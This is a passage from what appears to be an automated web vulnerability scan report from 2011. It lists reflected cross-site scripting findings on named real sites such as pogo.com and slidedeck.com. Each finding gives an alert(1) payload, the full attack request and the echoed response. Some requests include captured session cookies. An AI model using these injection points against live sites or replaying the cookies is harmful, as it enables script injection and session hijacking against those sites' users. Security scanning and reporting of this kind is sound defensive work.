Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:55:58 GMT
Server: Apache-Coyote/1.1
Content-Length: 25778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
op6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.pogo.com/prize/prize.do?pageSection=footer_prize8b79d</script><script>alert(1)</script>28f760955af";
s.eVar2="pogo";
s.pageName="Pogo Prize Page";
s.prop2="pogo";
s.channel="prizes";
s.eVar18="un_footer_prize8b79d%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28f760955af"
...[SNIP]...

3.618. http://www.pogo.com/sitemap [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/sitemap

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9b56"><script>alert(1)</script>c47acb8a68d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitemap?a9b56"><script>alert(1)</script>c47acb8a68d=1 HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

3.619. https://www.pogo.com/action/pogo/signin.do [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/action/pogo/signin.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ac9"><script>alert(1)</script>0baf35176c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /action/pogo/signin.do?pageSection=footer_login&29ac9"><script>alert(1)</script>0baf35176c0=1 HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

3.620. http://www.slidedeck.com/download [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.slidedeck.com
Path:	/download

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 71eb8--><script>alert(1)</script>873957fd8a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /download71eb8--><script>alert(1)</script>873957fd8a7 HTTP/1.1
Host: www.slidedeck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 03:10:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 03:10:31 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.slidedeck.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta charset="
...[SNIP]...
<script>alert(1)</script>873957fd8a7 ) in 0.65286 seconds, on Jan 9th, 2011 at 3:10 am UTC. -->
...[SNIP]...

3.621. http://www.slidedeck.com/usage-documentation [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.slidedeck.com
Path:	/usage-documentation

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 5bb51--><script>alert(1)</script>578321f4700 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /usage-documentation5bb51--><script>alert(1)</script>578321f4700 HTTP/1.1
Host: www.slidedeck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 03:09:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 03:09:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.slidedeck.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28407

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta charset="
...[SNIP]...
<script>alert(1)</script>578321f4700 ) in 1.84841 seconds, on Jan 9th, 2011 at 3:09 am UTC. -->
...[SNIP]...

3.622. http://www.thedailynews.cc/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thedailynews.cc
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a39c5"><script>alert(1)</script>16e0513e3bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a39c5"><script>alert(1)</script>16e0513e3bf=1 HTTP/1.1
Host: www.thedailynews.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 09 Jan 2011 01:20:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Expires: Sat, 08 Jan 2011 01:20:42 GMT
Set-Cookie: UID=15824304; expires=Mon, 31-Dec-2012 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSASAASQB=FDNAOIEABLECEOILNOBIAMFL; path=/
Cache-control: private

<html>
<head>
<META HTTP-EQUIV="Expires" CONTENT="0">

<META NAME="GENERATOR" Content=" 1up! Software ( www.going1up.com ) News Site Software 5.5">

<META NA
...[SNIP]...
<form method="post" action="index.asp?a39c5"><script>alert(1)</script>16e0513e3bf=1&PollID=70#PollSection" id="pollform">
...[SNIP]...

3.623. http://board-games.pogo.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://board-games.pogo.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e300f</script><script>alert(1)</script>d94ebed0ad1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: board-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e300f</script><script>alert(1)</script>d94ebed0ad1

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=ADCD5D39271EF5BAF3003643A7C2C4E3.000064; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606235227007261; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:35 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:06:34 GMT
Server: Apache-Coyote/1.1
Content-Length: 106176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=e300f</script><script>alert(1)</script>d94ebed0ad1";
s.eVar2="pogo";
s.pageName="Unauth Category Page filter - board";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:playersOnline::Unauth Category Page filter - board:Non Authenticated";
s.prop8=
...[SNIP]...

3.624. http://board-games.pogo.com/games/monopoly [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://board-games.pogo.com
Path:	/games/monopoly

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91bb8</script><script>alert(1)</script>1a8a6141c5c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /games/monopoly HTTP/1.1
Host: board-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=91bb8</script><script>alert(1)</script>1a8a6141c5c

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=62C5412862A370B830087242C602D886.000018; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606531579812360; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:25 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache-Coyote/1.1
Content-Length: 60425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=91bb8</script><script>alert(1)</script>1a8a6141c5c";
s.eVar2="pogo";
s.pageName="monopoly Game Brick Unauth Landing";
s.prop2="pogo";
s.channel="games";
s.prop7="POGO:games:::monopoly Game Brick Unauth Landing:Non Authenticated";
s.prop8="Non Authenti
...[SNIP]...

3.625. http://board-games.pogo.com/games/online-chess [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://board-games.pogo.com
Path:	/games/online-chess

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f9be</script><script>alert(1)</script>b2070efcc4c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /games/online-chess HTTP/1.1
Host: board-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5f9be</script><script>alert(1)</script>b2070efcc4c

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=3F5CAF26C5C2266BD22B3341D9CEA0B3.000018; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606531579812356; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:25 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache-Coyote/1.1
Content-Length: 54590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=5f9be</script><script>alert(1)</script>b2070efcc4c";
s.eVar2="pogo";
s.pageName="chess2 Game Brick Unauth Landing";
s.prop2="pogo";
s.channel="games";
s.prop7="POGO:games:::chess2 Game Brick Unauth Landing:Non Authenticated";
s.prop8="Non Authenticate
...[SNIP]...

3.626. http://board-games.pogo.com/games/risk [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://board-games.pogo.com
Path:	/games/risk

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a90c</script><script>alert(1)</script>f1db3c1e137 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /games/risk HTTP/1.1
Host: board-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1a90c</script><script>alert(1)</script>f1db3c1e137

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=608732383489B70ACCE1F5B4032B1B6D.000387; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606621774061665; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:08:33 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:08:33 GMT
Server: Apache-Coyote/1.1
Content-Length: 57712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=1a90c</script><script>alert(1)</script>f1db3c1e137";
s.eVar2="pogo";
s.pageName="risk Game Brick Unauth Landing";
s.prop2="pogo";
s.channel="games";
s.prop7="POGO:games:::risk Game Brick Unauth Landing:Non Authenticated";
s.prop8="Non Authenticated";

...[SNIP]...

3.627. http://card-games.pogo.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://card-games.pogo.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0ce5</script><script>alert(1)</script>85f9e6f8132 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: card-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d0ce5</script><script>alert(1)</script>85f9e6f8132

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=C0CA04025C79D9B48C1F98B7A5209A81.000320; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606303946526874; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:57 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:06:56 GMT
Server: Apache-Coyote/1.1
Content-Length: 105594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=d0ce5</script><script>alert(1)</script>85f9e6f8132";
s.eVar2="pogo";
s.pageName="Unauth Category Page filter - card";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:playersOnline::Unauth Category Page filter - card:Non Authenticated";
s.prop8="N
...[SNIP]...

3.628. http://card-games.pogo.com/games/rainy-day-spider-solitaire [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://card-games.pogo.com
Path:	/games/rainy-day-spider-solitaire

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48660</script><script>alert(1)</script>7be45d0934c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /games/rainy-day-spider-solitaire HTTP/1.1
Host: card-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=48660</script><script>alert(1)</script>7be45d0934c

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=B38986C5BF918FCB412E19A1E687EBF8.000064; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606235227007297; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:06:52 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:06:51 GMT
Server: Apache-Coyote/1.1
Content-Length: 60013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=48660</script><script>alert(1)</script>7be45d0934c";
s.eVar2="pogo";
s.pageName="spider Game Brick Unauth Landing";
s.prop2="pogo";
s.channel="games";
s.prop7="POGO:games:::spider Game Brick Unauth Landing:Non Authenticated";
s.prop8="Non Authenticate
...[SNIP]...

3.629. http://clubpogo-games.pogo.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://clubpogo-games.pogo.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f2d1</script><script>alert(1)</script>166a472ed8a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: clubpogo-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=4f2d1</script><script>alert(1)</script>166a472ed8a

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=EEBFB80E00A27E3CAE8C9A5EFE7F0617.000275; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606419910616984; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:07:32 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:07:32 GMT
Server: Apache-Coyote/1.1
Content-Length: 104828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://www.google.com/search?hl=en&q=4f2d1</script><script>alert(1)</script>166a472ed8a";
s.eVar2="pogo";
s.pageName="Unauth Category Page filter - club";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:playersOnline::Unauth Category Page filter - club:Non Authenticated";
s.prop8="N
...[SNIP]...

3.630. http://flash-games.pogo.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://flash-games.pogo.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42e11</script><script>alert(1)</script>27787d232a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: flash-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=42e11</script><script>alert(1)</script>27787d232a

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=5DC8AABF8E241FFC336D482CE25F100B.000050; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606492925065813; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:14:46 GMT; Path=/
Content-Type: text/html;charset=UTF-8
